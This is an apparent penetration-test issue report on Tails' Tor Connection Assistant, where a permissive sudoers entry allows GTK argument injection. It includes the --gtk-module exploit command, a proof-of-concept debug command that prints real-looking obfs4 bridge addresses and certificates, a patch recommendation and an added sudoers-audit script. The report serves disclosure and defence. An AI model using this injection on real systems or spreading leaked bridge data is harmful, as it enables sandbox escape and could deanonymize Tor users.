TCA - Local Privilege Escalation (LPE) to TCA Sandbox via GTK Argument Injection - Code Execution/deanonymization of TOR users
https://git.radicallyopensecurity.com/ros/pen-tails/-/issues/13
Description
The sudoers configuration allows the low-privileged amnesia user to inject arguments into the application /usr/local/bin/tca.
sudo -l
(root) NOPASSWD: /usr/local/bin/tca
If we run /usr/local/bin/tca --help we get the following output:
amnesia@amnesia:~$ sudo /usr/local/bin/tca --help
INFO:__main__:['/usr/local/lib/connect-drop', '-c', 'FILE:/run/tca/tca.state:r+', '-c', 'UNIX:/run/tca-portal.sock', '--', '/bin/ip', 'netns', 'exec', 'tca', '/sbin/runuser', '-u', 'amnesia', '--', 'bwrap', '--bind', '/', '/', '--proc', '/proc', '--dev', '/dev', '--bind', '/run/user/1000/.dbus-proxy/a11y-bus-proxy.sock', '/run/user/1000/tails-sandbox/a11y-bus-proxy.sock', '--bind', '/run/user/1000/.dbus-proxy/ibus-proxy.sock', '/run/user/1000/tails-sandbox/ibus-proxy.sock', 'env', 'DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus', 'XDG_RUNTIME_DIR=/run/user/1000', 'LANG=en_US.UTF-8', 'XDG_CURRENT_DESKTOP=GNOME', 'DISPLAY=:0', 'XAUTHORITY=/run/user/1000/.mutter-Xwaylandauth.QMWI21', 'WAYLAND_DISPLAY=/run/user/1000/wayland-0', 'DESKTOP_STARTUP_ID=', 'NOTIFY_SOCKET=', 'AT_SPI_BUS_ADDRESS=unix:path=/run/user/1000/tails-sandbox/a11y-bus-proxy.sock', 'IBUS_ADDRESS=unix:path=/run/user/1000/tails-sandbox/ibus-proxy.sock', '/usr/bin/python3', '-u', '/usr/lib/python3/dist-packages/tca/application.py', '--help', '--has-persistence', '--has-unlocked-persistence']
usage: application.py [-h] [--debug] [--debug-statefile DEBUG_STATEFILE] [--has-persistence]
[--has-unlocked-persistence] [--log-level {DEBUG,INFO,WARNING,ERROR}]
[--log-target {auto,stderr,syslog}]
[gtk_args ...]
positional arguments:
gtk_args
optional arguments:
-h, --help show this help message and exit
--debug
--debug-statefile DEBUG_STATEFILE
--has-persistence
--has-unlocked-persistence
--log-level {DEBUG,INFO,WARNING,ERROR}
Minimum log level to be displayed (default: INFO)
--log-target {auto,stderr,syslog}
Where to send log to; 'auto' will pick syslog IF stderr is not a tty (default: auto)
As you can see, the --help is passed through to the Python application /usr/lib/python3/dist-packages/tca/application.py. Note that the TCA application runs as the amnesia user, but inside the TCA network namespace. However, every GTK application accepts a set of default arguments. One of them is --gtk-module, which loads custom GTK modules. It works like LD_PRELOAD and gives any user code execution inside the GTK application. The attacker can build a custom .so file and load their shell with the following command:
sudo /usr/local/bin/tca --gtk-module /home/amnesia/Desktop/appmenu-gtk-module/builddir/src/gtk-3.0/libappmenu-gtk-module.so
POC - Leaking bridges
sudo /usr/local/bin/tca --debug --log-level=DEBUG
DEBUG:TCAApplication:Tor connection config: {'bridges': ['obfs4 192.95.36.142:443 CDF2E852BF539B82BD10E27E9115A31734E378C2 cert=qUVQ0srL1JI/vO6V6m/24anYXiJD3QP2HgzUKQtQ7GRqqUvs7P+tG43RtAqdhLOALP7DJQ iat-mode=1', 'obfs4 37.218.245.14:38224 D9A82D2F9C2F65A18407B1D2B764F130847F8B5D cert=bjRaMrr1BRiAW8IE9U5z27fQaYgOhX1UCmOpg2pFpoMvo6ZgQMzLsaTzzQNTlm7hNcb+Sg iat-mode=0', 'obfs4 85.31.186.98:443 011F2599C0E9B27EE74B353155E244813763C3E5 cert=ayq0XzCwhpdysn5o0EyDUbmSOx3X/oTEbzDMvczHOdBJKlvIdHHLJGkZARtT4dcBFArPPg iat-mode=0', 'obfs4 85.31.186.26:443 91A6354697E6B02A386312F68D82CF86824D3606 cert=PBwr+S8JTVZo6MPdHnkTwXJPILWADLqfMGoVvhZClMq/Urndyd42BwX9YFJHZnBB3H0XCw iat-mode=0', 'obfs4 193.11.166.194:27015 2D82C2E354D531A68469ADF7F878FA6060C6BACA cert=4TLQPJrTSaDffMK7Nbao6LC7G9OW/NHkUwIdjLSS3KYf0Nv4/nQiiI8dY2TcsQx01NniOg iat-mode=0', 'obfs4 193.11.166.194:27020 86AC7B8D430DAC4117E9F42C9EAED18133863AAF cert=0LDeJH4JzMDtkJJrFphJCiPqKx7loozKN7VNfuukMGfHO0Z8OGdzHVkhVAOfo1mUdv9cMg iat-mode=0', 'obfs4 193.11.166.194:27025 1AE2C08904527FEA90C4C4F8C1083EA59FBC6FAF cert=ItvYZzW5tn6v3G4UnQa6Qz04Npro6e81AP70YujmK/KXwDFPTs3aHXcHp4n8Vt6w/bv8cA iat-mode=0', 'obfs4 209.148.46.65:443 74FAD13168806246602538555B5521A0383A1875 cert=ssH+9rP8dG2NLDN2XuFw63hIO/9MNNinLmxQDpVa+7kTOa9/m+tGWT1SmSYpQ9uTBGa6Hw iat-mode=0', 'obfs4 146.57.248.225:22 10A6CD36A537FCE513A322361547444B393989F0 cert=K1gDtDAIcUfeLqbstggjIw2rtgIKqdIhUlHp82XRqNSq/mtAjp1BIC9vHKJ2FAEpGssTPw iat-mode=0', 'obfs4 45.145.95.6:27015 C5B7CD6946FF10C5B3E89691A7D3F2C122D2117C cert=TD7PbUO0/0k6xYHMPW3vJxICfkMZNdkRrb63Zhl5j9dW3iRGiCx0A7mPhe5T2EDzQ35+Zw iat-mode=0', 'obfs4 51.222.13.177:80 5EDAC3B810E12B01F6FD8050D2FD3E277B289A08 cert=2uplIpLQ0q9+0qMFrK5pkaYRDOe460LL9WHBvatgkuRr/SL31wBOEupaMMJ6koRE6Ld0ew iat-mode=0'], 'proxy': None}
Impact
- Access to the TCA sandbox running inside the UI may lead to direct control over the TCA service.
- Leaking configured TOR bridges could deanonymize the Tails user.
Patch
- Disallow arguments by adapting the sudoers entry for /usr/local/bin/tca.
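The following is an added example (not part of the original report or of Tails) that shows the weak sudoers entry beside a hardened one and audits a sudoers-style file for command specs that accept arbitrary arguments; the sample file is constructed, and only the /usr/local/bin/tca path comes from the report.

```shell
# Per sudoers(5), a command followed by an empty string ("") may only be run with
# no arguments, while a bare path (the report's tca entry) matches any argument
# list. SAMPLE_SUDOERS is a constructed sample for this demo.
SAMPLE_SUDOERS='# vulnerable: any argument, including --gtk-module, is accepted
amnesia ALL=(root) NOPASSWD: /usr/local/bin/tca
# hardened: the trailing "" restricts the command to no arguments at all
amnesia ALL=(root) NOPASSWD: /usr/local/bin/tca ""
Defaults env_reset'

# audit_sudoers_args FILE: print every command spec in FILE that accepts any
# arguments. Returns 1 if at least one was found, 0 otherwise.
audit_sudoers_args() {
    found=0
    while IFS= read -r line; do
        case "$line" in
            ''|'#'*|Defaults*) continue ;;   # blank lines, comments, Defaults
        esac
        # Reduce the line to its command list: drop the user/host part up to
        # '=', an optional "(runas)" group and tags such as NOPASSWD:
        cmnds=$(printf '%s\n' "$line" | sed \
            -e 's/^[^=]*=//' \
            -e 's/^[[:space:]]*([^)]*)[[:space:]]*//' \
            -e 's/^\([A-Z]*:[[:space:]]*\)*//')
        old_ifs=$IFS
        IFS=','
        for cmnd in $cmnds; do
            IFS=$old_ifs
            cmnd=$(printf '%s\n' "$cmnd" | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//')
            case "$cmnd" in
                *'""') ;;   # "" means no arguments allowed: safe
                *' '*) ;;   # explicit argument list, matched exactly (unless wildcards are used)
                *)
                    printf 'any arguments accepted: %s\n' "$cmnd"
                    found=1 ;;
            esac
        done
        IFS=$old_ifs
    done < "$1"
    return "$found"
}

# Stand-alone demo: write the constructed sample to a temp file and audit it.
demo_file=$(mktemp)
printf '%s\n' "$SAMPLE_SUDOERS" > "$demo_file"
if audit_sudoers_args "$demo_file"; then
    echo "no unrestricted command specs found"
else
    echo "unrestricted command specs found (see above)"
fi
rm -f "$demo_file"
```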